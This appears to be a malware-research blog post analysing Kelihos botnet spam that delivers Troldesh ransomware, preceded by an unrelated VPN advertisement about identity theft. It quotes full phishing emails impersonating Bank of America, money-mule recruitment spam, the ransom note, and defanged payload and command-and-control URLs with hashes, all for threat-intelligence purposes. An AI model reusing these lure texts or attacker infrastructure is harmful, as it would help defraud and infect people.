The anger and sadness Adam felt were bad enough, but the helplessness was even worse. There was nothing he could do to stop whoever was doing this to him. That’s the thing about identity theft – it’s a faceless crime and unfortunately most perpetrators get away with it.

Although Adam felt alone, the truth is he’s not. One in ten people will become the victim of an online crime. And many of them happen on public Wi-Fi. Some victims “just” lose money. However, if a hacker gets their hands on key personal information, you can lose way more than that.

We recently asked Adam and other real victims of identity theft to share their stories and tell us how it really feels to have your identity stolen. Watch now as Adam describes how this is definitely not something you want to have to go through.

After the interview, Adam said he hoped his story would make people realize that identity theft is real. It happens every day to people all over. But it doesn’t have to happen to you.

Check the link below to see why public Wi-Fi is so risky and protect yourself with Freedome VPN.


NoMoreRansom aka Troldesh Ransomware Delivered by Kelihos

My favorite guest blogger Arsh Arora, a malware analyst and Ph.D. researcher at UAB, is back with new and interesting facts about Kelihos, a botnet family that he has been tracking for a year and a half and providing some great intel about to the community and law enforcement. Today, he noticed that it is delivering URLs leading to Troldesh ransomware. Take it from here, Arsh ...

Kelihos botnet delivering Troldesh Ransomware impersonating Bank of America

No_More_Ransom, aka Troldesh encryption ransomware, is being delivered by Kelihos in the form of URLs embedded within email messages. The delivery mechanism is similar to previous cases of ransomware spammed by Kelihos. In early July, Kelihos introduced itself to the world of ransomware by spamming links to Wildfire ransomware, followed by CryptFIle2 ransomware in August. Then it shifted its focus towards different banking trojans such as Panda Zeus, Nymaim and Kronos. Now it has come full circle and struck back with Troldesh encryption ransomware. The funny thing is that the ransomware encrypts files with the extension ".no_more_ransom". Moreover, the spammed URLs redirected to download a JavaScript file or a Microsoft Word document. This is the first time that Kelihos has used JavaScript to infect users.

Another interesting observation was that this spam campaign was specifically geo-targeting Australian email addresses ending with ".au".  ".pl" email users were getting dating spam, while ".us" extension emails were being invited to sign up as Money Mules.  All other email TLDs were getting the traditional pharmaceutical spam.

NoMoreRansom aka Troldesh Ransomware

While doing the daily run of malware, one of my fellow researchers at UAB, Max Gannon, noticed a different behavior in the Kelihos botnet. It was sending embedded links using a Credit Debt theme. The most important fact is that some of the URLs redirected to download a .zip file containing a JavaScript file, while other links downloaded a Microsoft Word document. At the time of writing, most of the URLs were still live.

Subject: Please Settle Credit Arrears Shortly

Dear Client!

Our Credit Department has done research on your payment record for last year and learned that payments had not been made for last 3 months. We are now working on the issue pertaining to ways to help you with fulfilling liabilities and settling these arrears.

At the same time, we realize you may have had excellent reasons for such payment breakdown. That is exactly why we are contacting you now. Notwithstanding, if you are not proceeding your debt settlement, we will have to engage our enforcement units in commencing the law-suit case against you. This is the compulsory measure, so unfortunately, we may not help you.

Please process at least the very first payment at the earliest possible time. Else, charges may apply, and then the trial may be run.

We have made the full report of your situation. It contains the payment history, the total debt amount effective today, and further recommendations on arranging the issue. Please open and be guided with instructions as soon as possible.

The file can be found here: 
hxxp://greatwesternco[dot]com/wp-content/themes/twentyten/redirect[dot]php

Sincerely Yours,
Bank of America
Customer Relations Department
.

The following are the different subject lines that were spammed:
URLs that downloaded a .zip file containing JavaScript

Subject - Credit Department Discovered Your Debt - 
hxxp://eileenparker[dot]com/wp-content/themes/twentyten/redirect[dot]php

Subject - Pay for Credit Debt when Possible - 
hxxp://thehousepartnership[dot]co[dot]uk/wp-content/themes/twentyten/redirect[dot]php

Subject - Please Settle Credit Arrears Shortly - 
hxxp://chris-smith-web[dot]com/wp-content/themes/twentyten/redirect[dot]php

Subject - You Have a 3-Month Credit Debt - 
hxxp://infopro[dot]it/wp-content/themes/twentyeleven/redirect[dot]php

Fig. 1: Zip file downloaded with the embedded URL link

URLs that downloaded a Microsoft Word document

Subject - Please Settle Credit Arrears Shortly - 
hxxp://greatwesternco[dot]com/wp-content/themes/twentyten/redirect[dot]php

Subject - You Have a 3-Month Credit Debt - 
hxxp://greatwesternco[dot]com/wp-content/themes/twentyten/redirect[dot]php

URLs that were unreachable

Subject - Pay for Credit Debt when Possible - 
hxxp://starsounds[dot]net/wp-content/themes/twentyeleven/redirect[dot]php - Down

Infection by JavaScript has not previously been a behavior associated with Kelihos. Hence, it can be considered a noticeable change and a well-thought-out strategy by the bot operators.

Hashes of the JavaScript and Word document are:

1d57eba1cb761b99ffcf6bc8e1273e9c  instructions.doc
711881576383fbfeaaf90b1d6c24fce0  instructions.js

On the other hand, embedded URLs for Microsoft Word documents have been seen before. The document behaved in a similar fashion, asking the user to enable macros by clicking the "Enable Content" (aka "Encrypt Me") button. Once that is done, it downloads a payload from the following link:

hxxp://95[.]163[.]127[.]179/777[.]exe
MD5 - 8441efe3901a0ec7f18c6ef5159877cc

Virus Total Link - 777.exe VT

After the file is downloaded, it encrypts the system with the Troldesh encryption ransomware and adds the "no_more_ransom" extension at the end of each file on the system. The ransom note on the desktop was displayed in Russian as well as English.

Fig. 2: Desktop screen after encryption

Fig. 3: Ransom Note found in text ReadMe.txt

All the important files on your computer were encrypted.
To decrypt the files you should send the following code:
xxxxxxxxxxxxxxxxxxxxx
to e-mail address 2Lynness.Taftfera1990@gmail[dot]com .
Then you will receive all necessary instructions.
All the attempts of decryption by yourself will result only in irrevocable loss of your data.
If you still want to try to decrypt them by yourself please make a backup at first because
the decryption will become impossible in case of any changes inside the files.
If you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),
use the feedback form. You can do it by two ways:
1) Download Tor Browser from here:
https://www.torproject.org/download/download-easy.html.en
Install it and type the following address into the address bar:
http://cryptsen7fo43rr6.onion/
Press Enter and then the page with feedback form will be loaded.
2) Go to the one of the following addresses in any browser:
http://cryptsen7fo43rr6.onion.to/
http://cryptsen7fo43rr6.onion.cab/

The above is a plain text version of the ransom note. As can be seen, a Gmail address is being used, which is unusual behavior for this kind of ransomware.

Troldesh did not stop trolling the victim there; it also downloads the Pony malware, which contacts its command and control server at this location:

 hxxp://ipieceofcake[dot]com/wp-content/uploads/2016/04/gate[dot]php

When I visited the link it was down, but thanks to our Malware expert Neera Desai who works for PhishMe and is pursuing her Masters in Computer Forensics at UAB, we were able to visit the panel page of the Pony malware.

Fig. 4: Pony malware panel page

This was really fascinating, as Kelihos spammed URLs for Troldesh encryption ransomware with redirects to a malicious Microsoft Word document and a zip file containing JavaScript. The files eventually encrypt the system, but they also download the Pony malware to steal all the information from the victim's computer, causing a double blow to the victim.

Money Mule Spam 

The Kelihos botnet was not in a mood to stop. It also sent Money Mule spam geo-targeting users with ".us" United States email addresses. It impersonated a company from 'China looking for employees'.

Text of the email is as follows:

Subject: China company is looking for employees

We are the greatest transport company in China involved in 
transportation of high-dimension goods across the globe. At present, 
we are aimed at expanding by opening offices across the globe for 
deliveries of small consignments. We are looking for employees to 
open offices and ensure services (deployment and supervision of 
packages). All costs for the office establishment are undertaken by 
the organization. During the first month of your job, you and our 
employees are to be engaged in searching for the storage structure. 
You will be also required to appoint some amount of orders to your 
home address (not more than 10kg parcels a day) in order to check 
them for flaws and ship forward with pre-paid labels. We have a 
certain flow of parcels to date, and the work is already jogging on; 
if you are ready to start your operation right away, we are ready to 
pay 2800$ a month. In due course your salary will increase up to 
3500$ if you agree to work in the future office.

You have the following options of working with us:
1. You are working at home for the first month, receiving packages 
and shipping them forward; starting looking for an office place in 
your town (all the instructions you will receive from our managers)
2. You continue to work from home and get 2900$ every month, plus 
bonuses for fast shipped package
3. If something doesn't fit you and you decide to stop the job with 
us, we will pay you monthly salary and be waiting for you again in 
our team in the future!

If you have any questions please contact us at: kia01915@aol[dot]com

All costs for establishment the office are taken by the company, 
shipping is made with prepaid labels, this job does not require any 
financial investment from you. You can also combine this work with 
another one if you decide to work in the office in the future.
The convenient control panel of a corporate website will help you to 
track parcels, bonuses you are to get for a shipped package, and your 
personal information for salary and further job instructions.

The company ensures the following advantages:
1. Health benefits
2. Paid vacations and sick leaves
3. Paid flight tickets, gasoline

This is a temporary offer, as soon as we have a team of employees in 
your staff the vacancy will be closed.

Please contact our HR manager for further details: kia01915@aol[dot]com
.
Other subject lines that were spammed in the same theme are mentioned below with their corresponding reply-to email address.

Subject - China company is looking for employees - kia01915@aol[dot]com
Subject - We are hiring new employees to our office - kia01915@aol[dot]com
Subject - We are hiring new employees to our office - bree10682@aol[dot]com

Subject - Job opportunity - marquerite23894@aol[dot]com
Subject - Open vacancy - marquerite23894@aol[dot]com

The other thing to note is that all of the reply-to email addresses use AOL domains, which is notable in itself.


To conclude, Kelihos has been surprising researchers quite often, and it has become necessary to keep track of the botnet's different activities. The inclusion of ransomware brings interesting twists for research as well as for law enforcement. Another thing that I found while searching for NoMoreRansom was a group established by key leaders in the community to fight against the rise of ransomware.

So is the extension of NoMoreRansom a challenge to the people fighting it? Who knows? 
FYI: Things are about to get interesting!